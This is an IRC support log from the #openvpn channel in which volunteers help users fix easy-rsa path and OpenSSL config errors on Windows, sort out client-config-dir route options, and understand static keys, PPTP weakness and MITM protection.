[] 08:13 -!- Porkepix [~Porkepix@157.138.189.38] has joined #openvpn 08:19 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 248 seconds] 08:19 -!- Porkepix [~Porkepix@157.138.189.38] has quit [Ping timeout: 255 seconds] 08:28 -!- oyunokata [~rrinehart@209.163.177.130] has joined #openvpn 08:36 -!- Porkepix [~Porkepix@157.138.189.38] has joined #openvpn 08:40 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has quit [Ping timeout: 240 seconds] 08:40 -!- Porkepix [~Porkepix@157.138.189.38] has quit [Ping timeout: 252 seconds] 08:42 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn 08:42 -!- Porkepix [~Porkepix@157.138.17.185] has joined #openvpn 08:42 < Holiday> !welcome 08:42 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 08:42 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 08:47 -!- Porkepix [~Porkepix@157.138.17.185] has quit [Ping timeout: 276 seconds] 08:50 -!- Porkepix [~Porkepix@157.138.189.38] has joined #openvpn 08:58 -!- Porkepix [~Porkepix@157.138.189.38] has quit [Quit: Computer has gone to sleep.] 09:12 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has joined #openvpn 09:19 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:20 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has quit [Quit: manitu] 09:20 < Burgundy> Hello! This is my routing table in the VM I'm playing with: http://pastie.org/6012513. The two 10.8.x.x connections are VPN connections and, according to the routing rules I'd expect traffic to go through the 10.8.0.2 interface, however it seems that traffic goes through 10.8.3.2, disregarding the higher metric.What am I missing? 09:24 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds] 09:28 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 09:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds] 09:33 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 09:37 < Holiday> !howto 09:37 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 09:37 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 09:39 < Holiday> Question. Myself and a co-worker are looking to deploy a departmental VPN so we don't have to use the one provided by the main organization. So far we have an IPsec/L2TP VPN "mostly" working on RedHat (using OpenSwan and XL2TPD) but I've been told by the people in the openswan channel the way he's trying to do it requires a special config 09:41 < Holiday> issue is, I can't seem to find any more help than that (No guides online etc). I'm curious of OpenVPN would work any easier. The VPN server has dual interfaces (xxx.88.5 and xxx.88.120). We want to use eth1 (88.120) for the in and out of the VPN, but he also wants to avoid any NAT'ing or MASQ if possible while keeping the *client* machines also in a range of xxx.88.127 to xxx.88.145 09:42 < Holiday> Is that manageable with OpenVPN, or just as difficult as if we used OpenSwan (One reason I'm really pushing for OpenVPN is even though he wants to keep the setup simple for the clients, such as using the build in VPN clients, it just seems like each client requires its own tweaks within the config for OpenSwan and makes it rather annoying) 09:45 < shadoom> is this the right place to ask stuff about the android openvpn connector ?:D 10:02 < hg_5> hello if i set this path in openvpn vars.bat set HOME=C:\openvpn\easy-rsa it doesnt find it 10:02 < hg_5> what is proper path in this line? 10:20 -!- raidz_away is now known as raidz 10:29 -!- brute11k [~brute11k@89.249.235.2] has joined #openvpn 10:32 -!- brute11k1 [~brute11k@89.249.231.238] has quit [Ping timeout: 276 seconds] 10:40 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 245 seconds] 10:42 -!- blackmagic [~black@got.laid.using.blackmajic.org] has joined #openvpn 10:54 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 11:00 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 11:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 11:24 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 11:37 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 245 seconds] 11:50 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:51 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Client Quit] 11:51 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 12:10 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 12:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:15 -!- Rolybrau [noident@unaffiliated/rolybrau] has joined #openvpn 12:16 -!- Rolybrau [noident@unaffiliated/rolybrau] has quit [Client Quit] 12:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:25 < hg_5> anyone there? 12:28 <@ecrist> !ask 12:28 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 12:29 <@ecrist> hg_5: you need to escape the backslash 12:29 < hg_5> ecrist what? 12:29 <@ecrist> set HOME="C:\\openvpn\\easy-rsa" 12:29 < hg_5> double backslash??? 12:29 <@ecrist> yes 12:29 <@ecrist> a backslash is typically an escape character 12:32 <@ecrist> hg_5: that syntax is in the manual and the howto, btw 12:38 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 255 seconds] 12:39 < hg_5> ecrist and i still have problem: http://puu.sh/1VUeE (System cannot find the specified path) 12:40 < hg_5> my vars.bat file looks that: http://pastebin.com/gXntHM8V 12:41 <@ecrist> oh, I didn't realize this was a batch script 12:41 <@ecrist> remove the double slashes, but keep the quotes 12:45 < hg_5> and still the same http://puu.sh/1VUpx (System cannot find the specified path) 12:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 12:57 < hg_5> ecrist you know what is going on? 13:00 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 13:00 -!- Rolybrau [noident@unaffiliated/rolybrau] has joined #openvpn 13:00 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 13:07 -!- mode/#openvpn [+v pekster] by ChanServ 13:07 <+pekster> hg_5: No quotes in that since it's windows batch 13:07 <+pekster> hg_5: Syntax should be as follows: set HOME=C:\openvpn\easy-rsa 13:07 < hg_5> pekster i have tried with no quotes on begin, but had same, didnt work 13:07 <+pekster> (assuming you moved the entire easy-rsa directory to that path, including all the support files that shipped with the openvpn distribution) 13:08 <+pekster> hg_5: And you re-ran "vars.bat" after setting the path to the place where you're keeping easy-rsa? 13:09 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:09 < hg_5> pekster, yes look http://puu.sh/1VV0g 13:10 < hg_5> what you mean "re-ran vars.bat" ? 13:11 <+pekster> After you update the cocde on line 6 to point to your correct path, you must *then* run 'vars' or it will use the old (default on installation) path 13:11 <+pekster> You did it in that order, right? 13:13 < hg_5> ohh, i didnt run vars.bat 13:13 <+pekster> Yea, that file just sets the environmental variables 13:14 <+pekster> All the scripts require those variables set correctly to work 13:14 <+pekster> So, *every* time you open a new command window (or change vars.bat) you must run it again to update the variables 13:14 < hg_5> ok i run vars.bat, but i still get the same "system cannot find the specified path, after clean-all command 13:15 <+pekster> hg_5: Oh, KEY_DIR=keys 13:15 <+pekster> It's a realative path, not absolute 13:15 <+pekster> hg_5: Same with your KEY_CONFIG 13:16 <+pekster> That needs to be openssl-1.0.0.cnf 13:16 <+pekster> It's all relative to your %HOME% 13:19 -!- Rolybrau [noident@unaffiliated/rolybrau] has quit [Quit: Rolybrau] 13:19 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Ping timeout: 248 seconds] 13:23 -!- Porkepix [~Porkepix@net-188-216-189-124.cust.dsl.vodafone.it] has joined #openvpn 13:25 < hg_5> pekster ehh still the same problem, it didnt help 13:26 < hg_5> http://puu.sh/1VVqu 13:26 <+pekster> You didn't re-run vars from the look of it 13:26 <+pekster> Look at your cmd history 13:27 <+pekster> You copy the sample file in (presumably needing to fix it up first) and then run clean-all. It fails. Then you run it again. Of course it'll fail becuase nothing has changed in the environment 13:27 * ecrist cannot wait to revamp that miserable piece of software 13:28 <+pekster> ecrist: Yea, it's a bit worse for the Windows side (missing scripts to sign without building a key, etc. I'll be happy to see it go. That patch was just a band-aid really) 13:29 <+pekster> I haven't looked at the new replacement as I've had my own personall scripts for a while that do exactly what I like 13:30 <@ecrist> there's no replacement yet, but it's going to operate much like ssl-admin does now, with batch capabilities 13:31 <+pekster> Ah, k. Yea, ssl-admin was the name I was thinking of. Either way, I just started a system from scratch, and I like it. 13:32 <@ecrist> :) 13:32 <+pekster> But I'm picky about how my certs work 13:33 < hg_5> pekster when i run "vars" command, after that i deleted vars.bat and copied my vars.bat 13:33 -!- Porkepix [~Porkepix@net-188-216-189-124.cust.dsl.vodafone.it] has quit [Quit: Computer has gone to sleep.] 13:34 <+pekster> hg_5: Unless I'm missing command history in that screenshot, you ran clean-all twice without running 'vars' again. That doesn't work. A different cmd window has its own environment 13:34 < hg_5> i just wanted to check if i get same error 13:34 < hg_5> thats why i run it twice 13:35 <+pekster> Between the "copy vars.bat.sample vars.bat" step and "vars" command, did you update the file to look like your Notepad++ screenshot shows? 13:35 <+pekster> It's crucial that you did, becuase otherwise that error is quite expected 13:36 <+pekster> hg_5: Oh, no quotes on line 7 13:36 <+pekster> batch treats quotes as a literal quote character 13:36 <+pekster> (which aren't allowed in filenames anyway) 13:36 <+pekster> (yes, MS batch is stupid) 13:38 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:41 -!- bwallen [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has quit [Quit: Leaving] 13:41 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 13:43 < hg_5> can you look i will stream what am i doing ? 13:43 < hg_5> www.justin.tv/ryyyiu 13:44 <+pekster> http://puu.sh/1VVqu fix line 7 13:44 <+pekster> No " chcaracter 13:44 < hg_5> i have fixed 13:44 <+pekster> re-sourced vars? No need to keep running init-config 13:45 <+pekster> Stop copying the vars.bat.sample too 13:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:45 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 13:45 <+pekster> Just fix your vars, run 'vars' in a console, and 'clean-all' will delete and re-create the 'keys' directory and copy in index.txt.start and serial.start to the keys dir 13:45 < hg_5> oh it works now ;' 13:47 < hg_5> hm whats that error http://puu.sh/1VW0z 13:48 < hg_5> and this in the same command (build-key client1) http://puu.sh/1VW1Q 13:48 -!- b1rkh0ff [~b1rkh0ff@178.77.20.138] has joined #openvpn 13:48 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 13:48 -!- nickanderson [~cmdln@ginger.pilgrimpage.com] has joined #openvpn 13:48 < hg_5> pekser? 13:48 < hg_5> pekster 13:49 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has joined #openvpn 13:50 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 13:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 13:55 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 14:01 <+pekster> hg_5: Sounds like you have a non-unique CN perhaps? https://community.openvpn.net/openvpn/ticket/229#no1 14:01 <@vpnHelper> Title: #229 (easy-rsa: failed to update database > TXT_DB error number 2) – OpenVPN Community (at community.openvpn.net) 14:02 -!- brute11k1 [~brute11k@89.249.231.86] has joined #openvpn 14:02 < hg_5> pekster if i will re-try this process on virtual machine with fresh windows instalation, will it work? 14:03 -!- exed [~maximus@ppp-46-244-149-179.dynamic.mnet-online.de] has joined #openvpn 14:03 <+pekster> It should. Or just re-install openvpn and use a freash easy-rsa copy 14:03 <+pekster> (if you have an un-modified prestine version it should work too) 14:03 <+pekster> The scripts especially for windows are really, really, bsic 14:04 <+pekster> The Linux version does a bit more behind-the-scenes work, but the Windows batch are about the most simple you can get 14:04 <+pekster> I'm betting either your CNs aren't unique, or that you somehow clobbered your serial file 14:04 -!- brute11k [~brute11k@89.249.235.2] has quit [Ping timeout: 276 seconds] 14:05 <+pekster> Without context there's really no way to know 14:07 -!- nickanderson is now known as nickanderson_afk 14:08 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 14:09 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 14:10 < kothog> I have a working OpenVPN server using certificates. In the client config files (named after the certs) I have the directives for pushing routes (Works fine.) I have iroute (works fine) but I also have "route 10.10.11.0 255.255.255.0 10.0.0.20" where 10.0.0.20 is the client's openvpn ip address and 10.10.11.0/24 is the subnet *on the client*. I want the server to automatically add the routes when the client connects, and destroy them when the client dis 14:11 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 14:16 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 248 seconds] 14:17 <+pekster> kothog: THat's doable, yea. You're missing splitlong.pl or such becuase it got cut off after "destroy them when the client dis" ... 14:17 < kothog> oh woops. :) 14:17 < kothog> connects. Is this possible? 14:17 < kothog> ^^ the rest of the line. 14:17 < kothog> pekster: Thanks for the reminder, also. 14:17 <+pekster> Ah, okay. That much I inferred. Yea, you can use 'route' inside a ccd like that 14:18 < kothog> hrm. in that case either the config file isn't being read, or something on the system is interfering with the ability to add routes. 14:19 <+pekster> Downgrading permission perhaps? 14:19 <@krzee> you dropping permissions? 14:19 <@krzee> damn, beat me to it! 14:19 * pekster wins this round 14:19 < kothog> good idea I'll check 14:19 <+pekster> About time I win one ;) 14:19 < kothog> ps auxww | grep -i openvpn 14:19 < kothog> root 1433 14:19 <+pekster> What's the log say? 14:19 <+pekster> I think at verb 3 it should tell you even if successful, but maybe you need 'verb 4' for that 14:19 <+pekster> You should get errors regardless 14:20 <@krzee> ild say always verb 4 while debugging, unless firewall can possibly be an issue, then verb 5 14:20 <+pekster> Yea. verb 4 is better since it's more talkatitive when processing the ccd files 14:20 <+pekster> Okay, time for afternoon coffee. My typing is getting worrse... 14:21 <@krzee> im putting up fencing today while sick… bout ready to die 14:21 < kothog> It's running at verb 4. No errors at the moment relating to routes. The last message it reports for that clietn when it connects is SENT CONTROL [Venn_VPN]: 'PUSH_REPLY,route {etc} 14:22 < kothog> so, TLS verifying okay, data channel encrypt.. Control Channel message, PUSH: Received control message: 'PUSH_REQUEST', send_push_reply(): safe_cap=960, and then: SENT CONTROL [Venn_VPN]: 'PUSH_REPLY,route {etc} 14:25 < kothog> whoah, there we go. 14:26 -!- Maverick0984 [maverick@poundcs.org] has joined #openvpn 14:26 < kothog> lots of debugging info. 14:26 < Maverick0984> anyone had any success in using OpenVPN GUI with PhoneFactor or similar? 14:26 < Maverick0984> OpenVPN GUI times out the authentication before the call can be made 14:27 < kothog> OPTIONS IMPORT: reading client specific options from: /et 14:27 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Read error: Operation timed out] 14:27 < kothog> c/openvpn/clients/err.. 14:27 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 14:27 < kothog> OPTIONS IMPORT: reading client specific options from: /etc/openvpn/clients/Venn_VPN, then: Options error: option 'route' cannot be used in this context 14:27 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 14:27 < kothog> aaaargh 14:28 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 14:39 -!- rrva [unknown@y.mima.x.se] has joined #openvpn 14:40 < rrva> hi! If I turn off encryption, will still the authentication be safe from eavesdropping? I use a static key 14:41 <+pekster> There is no authentication with static keys (ie: using --secret.) Ownership of the key is considered proof that the peer is authorized 14:48 < rrva> yes, but I mean, is there something protecting the static key from being eavesdropped? And if so, will that protection be turned off if I turn off encryption? 14:48 <+pekster> The static key is never sent over the wire 14:48 <+pekster> Turning off encryption in a static keyed setup is pointless. Use a GRE tunnenl if that's what you want 14:48 < rrva> ah ok it is just a shared secret 14:49 < rrva> does tomato router support gre? 14:49 <+pekster> Any Linux will, yea 14:49 < rrva> i just need a tunnel only usable by me, but i do not need encryption 14:49 <+pekster> 'man ip-tunnel' for that then 14:50 < rrva> oh ok 14:50 <+pekster> OpenVPN is designed around the premise of using openssl for encryption 14:53 < kothog> Huh. Guess 'route' can't be used inside a ccd after all. 14:54 <+pekster> Hmm, I thought it could. manpage doesn't list it though, so I'm likely mistaken 14:54 < kothog> pekster: Which manpage are you looking at? 14:55 <+pekster> 2.3.0 14:55 <+pekster> Same for 2.2.2 14:55 < kothog> When you say it doesn't "list" it though, is there a list of commands that can be used in a ccd? 14:56 <+pekster> See --client-config-dir 14:56 <+pekster> !man 14:56 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 14:56 < kothog> okay thanks! well I certainly appreciate the help. 14:57 <+pekster> Sorry to have led you down the wrong path. I thought you could do that, but apparently not. You could probably work some magic into a --client-connect & --client-disconnect script to do it too, although that's more work 14:57 < kothog> ah HAH:" The following options are legal in a client-specific context" 14:58 < kothog> yeah no worries, it made me learn quite a bit more about openvpn tracing it down, and in my experience that's never a bad thing. :) 14:58 -!- gajop [~gajop@unaffiliated/gajop] has joined #openvpn 14:58 <+pekster> Did thte log actually complain about it? 14:58 < kothog> pekster: Yeah it turns out it was complaining about it, but it had been running for so long that syslog had rotated those initial config errors right out of the way 14:58 < gajop> so.. i don't have the CA cert of my uni's VPN, how can i obtain it if i know its' address so openvpn doesn't complain? 14:58 < kothog> so when I restarted it, the errors showed up again. 14:58 <+pekster> Ah, gotcha :) 14:58 < gajop> .. can openvpn even be used for work VPNs? 14:59 <+pekster> gajop: Sure, openvpn is GPL, so as long as they aren't reselling the software without providing the source to customers, it's completely legal. https://www.gnu.org/licenses/gpl-2.0 14:59 <@vpnHelper> Title: GNU General Public License v2.0 - GNU Project - Free Software Foundation (at www.gnu.org) 15:00 <+pekster> As for the CA cert, they should publish that somewhere online, sometimes in a release package, or sometimes by itself. It's non-trivial to "obtain" it from a running service if you don't have it 15:01 <+pekster> openssl's s_client might be able to hack something if it's a TCP server, but the more-common UDP mode is even harder to swipe the cert. Maybe you could use a fake ca locally and wireshark/tcpdump the traffic and rip out the x509 from the data stream 15:01 < gajop> pekster: what? no, that's not what i asked; i'm wondering if i can use the openvpn client to connect to the work network, not sure what's the difference if any between "regular vpn" you can create in MS windows and openvpn 15:01 <+pekster> OpenVPN uses its own protocol 15:01 < gajop> ok so nvm then :p 15:01 <+pekster> It's not IPSec or PPTP or L2TP or any of that 15:02 < gajop> they aren't very technical, but i think they're using ppp over ip 15:02 <+pekster> Not very secure then :) 15:03 <+pekster> PPTP is also basically broken completely as of 2012 15:03 <+pekster> (it's been known to be very week for a decade prior to that, so anyone using it has had their head burried in the sand for a while) 15:03 < gajop> honestly don't care, i just need to access some articles and i need to be on the uni network for that :p 15:03 <+pekster> Right 15:04 <+pekster> Yea, openvpn only talks to another openvpn peer 15:04 <+pekster> And it speaks the openvpn protocol to do so ;) 15:04 < gajop> yeh, ok, i did use it before with friends; guess ill need to configure this broken pppd for work ;/ 15:05 <+pekster> In TLS modes (ie: server/mutli-client mode, or 'mode server') there's a standard TLS-handshake, but the data is multiplexed on top of the same network socket 15:05 <@krzee> !pptp 15:05 <@vpnHelper> "pptp" is (#1) PPTP is known to be a faulty protocol. The designers of the protocol, Microsoft, recommend not to use it due to the inherent risks. Lots of people use PPTP anyway due to ease of use, but that doesn't mean it is any less hazardous. The maintainers of PPTP Client and Poptop recommend using OpenVPN (SSL based) or IPSec instead. http://pptpclient.sourceforge.net/protocol-security.phtml to 15:05 <@vpnHelper> read about why to not use pptp or (#2) Why not to use it: http://en.wikipedia.org/wiki/Pptp#Security or (#3) https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ 15:05 <@krzee> (for more info on what pekster said) 15:06 <+pekster> How come no one listens to B. Schennier until someone actually breaks a protocol? :( 15:06 <@krzee> no kidding 15:06 <@krzee> hell even microsoft once said it was broken 15:06 <+pekster> Well, not until last year 15:06 <+pekster> (after the moxie break) 15:06 <@krzee> nah they said it long ago 15:06 < neilhwatson> Don't they always plug their ears and yell LA! LA! LA1 until it's cracked? 15:07 <@krzee> referenced here long before moxie http://pptpclient.sourceforge.net/protocol-security.phtml 15:07 <@vpnHelper> Title: PPTP Client (at pptpclient.sourceforge.net) 15:07 < gajop> yeh.. well mail it to my uni's network admins, also mind telling them to use some form of SSL for pop3/imap? 15:07 <+pekster> Basically. They "recommended" L2TP when that came out, but they didn't exactly push people off pptp very well 15:08 <+pekster> There are still lots of corp shops using it. Many of those still accept MS-CHAPv1 too ;) 15:08 < neilhwatson> Careful gajop, more draconian uni's might see you actions as hacking if you are trail and erroring a third party vpn client. 15:09 <+pekster> Downgrade attacks anyone? On that note, go check your openvpn installations for --tls-cipher if you want a hardened setup 15:09 <@krzee> yes, you may want to get permission first 15:10 < gajop> unlikely, i teach there and know most of the admins by name; 15:10 <+pekster> Oh, actually the ovpn peer won't present the CA, just its own cert. I don't think openvpn allows you to use --ca with a non-CA-signed cert 15:10 <+pekster> So, you're hosed unless you 1) get the proper CA cert or 2) patch openvpn to connect anyway (which is REALLY REALLY insecure) 15:10 <@krzee> right 15:11 <@krzee> you're actually able to use split-ca's, not that i can find a reason to do it 15:11 -!- nickanderson_afk is now known as nickanderson 15:11 <@krzee> with servers using 1 CA and clients using another 15:11 <+pekster> Sure, but each side still needs the CA of the other peer's cert 15:11 <@krzee> as long as each side has the others ca.crt 15:11 <@krzee> yes 15:11 <+pekster> THat might be more useful in a sub-CA setup 15:11 <@krzee> otherwise you dunno who the other side is, or that they are who they say 15:12 <+pekster> ie: rootCA -> [intermediate_serverCA & intermediate_clientCA ] -> client certs 15:12 -!- gajop [~gajop@unaffiliated/gajop] has left #openvpn ["WeeChat 0.4.0"] 15:12 <+pekster> s/client/peer/ 15:12 <@krzee> would there be a point? 15:12 <+pekster> Not really. Maybe keep the server intermediate offline 15:13 <@krzee> lol EugeneKay nice hostname 15:14 <+EugeneKay> krzee - check the matching website ;-) 15:14 <@krzee> lol 15:14 -!- exed [~maximus@ppp-46-244-149-179.dynamic.mnet-online.de] has quit [Quit: exed] 15:14 <@krzee> nice neckbeard! 15:14 <@krzee> :-D 15:14 <+EugeneKay> That's an old pic. I haven't bothered to update it since I became a firefighter 15:15 <+EugeneKay> I shave at least every other day now 15:18 <+EugeneKay> krzee - you should see my collection of stupid hostmasks 15:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:24 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has joined #openvpn 15:28 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 15:32 < Maverick0984> so does nayone know of a way to delay the authentication timeout? for something like a phone call two-factor setup? 15:32 < Maverick0984> any sort of entry in the config that would accomplish this? 15:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:34 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has quit [Quit: leaving] 15:38 < hg_5> ehh whats wrong come on, im trying this on windows xp fresh installed http://puu.sh/1VZn7 15:42 < hg_5> pekster maybe you know ;' ? 15:48 < hg_5> i have installed openvpn 2.3 (32bit version) and i can't find where is openssl.cfg 15:48 -!- u0m3 [~Radu@92.80.92.99] has quit [Read error: Connection reset by peer] 15:49 -!- Eagleman7 [~Eagleman@5.45.183.189] has joined #openvpn 15:50 < hg_5> do i have to download and install separately openssl or what hm? 15:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:51 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Ping timeout: 245 seconds] 15:52 -!- u0m3 [~Radu@92.80.123.64] has joined #openvpn 15:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 245 seconds] 15:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:01 < Eagleman7> Does each instance ( udp/tcp ) needs its own chroot directory or can they share the chroot dir ? 16:01 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:02 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:03 -!- nickanderson is now known as nickanderson_afk 16:05 -!- Eagleman7 [~Eagleman@5.45.183.189] has quit [Ping timeout: 248 seconds] 16:08 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 16:09 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 16:11 <+pekster> hg_5: that error is unimportant since the KEY_CONFIG is what gets passed instead 16:12 <+pekster> If you incorrectly referenced that relative to your %HOME% variable, easy-rsa doesn't work 16:12 <+pekster> If you don't have openssl in your %PATH% easy-rsa won't work 16:12 < hg_5> pekster , ;o finally got it to work , i have downloaded and installed http://slproweb.com/download/Win64OpenSSL-1_0_1c.exe 16:12 < hg_5> then took from there openssl.cfg and moved it to openvpn folder 16:12 <+pekster> That will cause you problems unless you patched the cnf file to be openvpn-friendly 16:13 <+pekster> Unless you don't use MITM protection, in which case your VPN isn't as secure as it should be 16:13 <+pekster> See: 16:13 <+pekster> !mitm 16:13 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 16:13 < hg_5> then i used this command in command prompt set OPENSSL_CONF=c:\[PATH TO YOUR OPENSSL DIRECTORY]\bin\openssl.cfg 16:14 -!- rrva [unknown@y.mima.x.se] has quit [Quit: Lost terminal] 16:14 < hg_5> MITM protection? 16:14 <+pekster> hg_5: Read the link. Ask after if you still don't get it 16:14 <+pekster> Also, note that build-key.bat and most of the other scripts specifically use -config %KEY_CONFIG% 16:14 <+pekster> So, copying in a stock openssl.cnf file won't build server certs properly 16:15 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:15 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 16:15 <+pekster> It'll probably break, actually, since the -extensions server won't exist 16:15 <+pekster> (this is why openvpn ships with its own openssl.cnf file) 16:19 < hg_5> pekster one more error http://puu.sh/1W0HM 16:19 < hg_5> what is the problem? 16:19 < hg_5> i got only this error now 16:20 < hg_5> pekster i meant about openssl.cfg not openssl.cnf 16:20 <+pekster> Same thing 16:20 <+pekster> It's the "openssl configuration file" 16:20 < hg_5> this process required openssl.cfg 16:20 < hg_5> so i can change openssl.cnf to openssl.cfg? 16:20 <+pekster> Then you named it like that in vars.bat 16:20 <+pekster> You can name it unicorn.jpg for all it matters 16:21 <+pekster> You need to reference it properly in the scripts that use the config file 16:21 <+pekster> If you've failed to reference it correctly, or failed to use the openvpn-specific configuration, or some combination of the above, stuff won't work 16:22 <+pekster> This is why it's easiest to just run easy-rsa from the installed path that OpenVPN puts itself in when you install. You're "managing everything yourself" if you move the directory like you've done, and it's implicitly assumed you have a good idea how openssl and easy-rsa works to do it 16:22 < hg_5> pekster i told you i have installed openvpn 2.3 on fresh new system(windows xp 32bit) 16:23 < hg_5> and i re do all process and still got errors ... 16:23 <+pekster> Using it from C:\program files\openvpn\easy-rsa ? 16:23 < hg_5> yes! 16:23 < hg_5> and on fresh new system got this error ;o can't open config file /etc/ssl/openssl.cnf 16:24 < hg_5> so.................. 16:24 <+pekster> It's a warning, not an error 16:24 <+pekster> It's just looking in the "default place" for that file and not finding it 16:24 <+pekster> Assuming the scripts haven't been altered to lack the "-config %KEY_CONFIG%" part, it's using the one from vars.bat 16:25 <+pekster> I'll double-check everything works in my XP VM using 2.3.0, but it should... 16:26 < hg_5> pekster can you pastebin vars.bat.sample ? 16:27 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 252 seconds] 16:28 <+pekster> hg_5: Stock vars.bat.sample in a 2.3.0 (32-bit) install on XP: http://fpaste.org/G3Ji/ 16:28 < hg_5> yes i have also this , same stock 16:29 <+pekster> WOrks fine for me. If I make no changes to the vars.bat file and run it, as long as my CN is unique 16:30 <+pekster> I can successfuly reproduce your error if you use the same cert CN 16:30 <+pekster> You are not allowed to do that 16:30 <+pekster> Don't do it 16:30 < hg_5> i have made changes in vars.bat from line 31 to 40 